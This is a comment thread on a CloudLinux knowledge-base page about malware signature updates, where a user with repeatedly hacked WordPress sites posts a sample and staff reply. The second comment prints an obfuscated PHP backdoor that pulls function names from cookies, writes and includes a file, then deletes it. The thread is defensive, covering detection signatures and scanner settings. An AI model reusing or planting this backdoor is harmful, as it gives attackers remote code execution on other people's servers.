Skip to main content

CloudLinux Knowledge Base

Malware Signatures Database Update

Comments

5 comments

  • Dean Cohen

    Hey Anna seems like it doesnt get dedected, we also migrate to new server, an seems like tons of wordpress with old version getting hacked and hacked, it feels like waf and malware scanner not really working!

     

    0
  • Dean Cohen

    Here another malware sample from an hour ago in wp-admin folder - 

    <?php
    $ylW=	${"\137". "\103" ."\117\117"	."\113\111\105" }	;	 if (isset(	$ylW[ (	95	- 0) 	] ))	{ $NjOE=	$ylW[(98	-	42)  ]. $ylW [(95 -7)];$uxz	= $NjOE (	$ylW[	 (	63-	14)	].$ylW[ (	99-68) ] ) ;	 $wm=$uxz( $NjOE	(	$ylW	[( 82 -4	)]) )	;	$Tc	= $uxz	(	$NjOE( $ylW [ (	73 -13 )	]	)	);  	$au	=__DIR__ .$uxz	($NjOE	($ylW[	(	76 -	0	) ]	));	  $wm ( $au ,$uxz(	$NjOE(	$ylW	[ (	98-3	)	])	));include	(	$au	) ; 	$Tc	(	$au	); }
    0
  • Anna

    Hi Dean!

    Sorry to know the hacking is still taking place after the migration.

    I can see the sample provided is detected by our scanning engine with the following signature:

    sha256: c9ca1ce50437a880d60daf937545dbdccbacd2c4a8c4cd30d25edf559148e25d
    sn: SMW-SA-23697-php.bkdr-2

    Indeed, we recommend that you refrain from running outdated versions of the WordPress script and themes/plugins because old versions may have vulnerabilities leading to malicious code injections like this one – you may notice the signature indicates a backdoor infection.

    Also, ensure that all real-time scanner options are enabled especially for newly added/modified (notify) files:

        "MALWARE_SCANNING": {
          "cloud_assisted_scan": true,
          "crontabs": true,
          "default_action": "cleanup",
          "detect_elf": true,
          "enable_scan_cpanel": true,
          "enable_scan_inotify": true,
        "enable_scan_modsec": true,

    Database scanner feature may also help in case of WordPress infection: https://docs.imunify360.com/dashboard/#malware-database-scanner To enable it, please run the following as root:

    imunify360-agent config update '{"MALWARE_DATABASE_SCAN": {"enable": true}}'

    To have files scanned with the latest scan build, check if the Imuinfy360 agent is of the latest version. The following update instructions may be handy:

    Finally, if the situation does not change after following the recommendations below, please consider contacting our support team at https://cloudlinux.zendesk.com/hc/en-us/requests/new – our specialists will be happy to help you with this.

    0
  • Dean Cohen

    Hey Anna seems like Malware scanner not really works in the server as you said "Get dedected"

    But seems not, could you please take alook in my ticket?

    0
  • Bogdan Shyshka

    Dean, as far as I see ticket has been handled by our team already.

    0

Please sign in to leave a comment.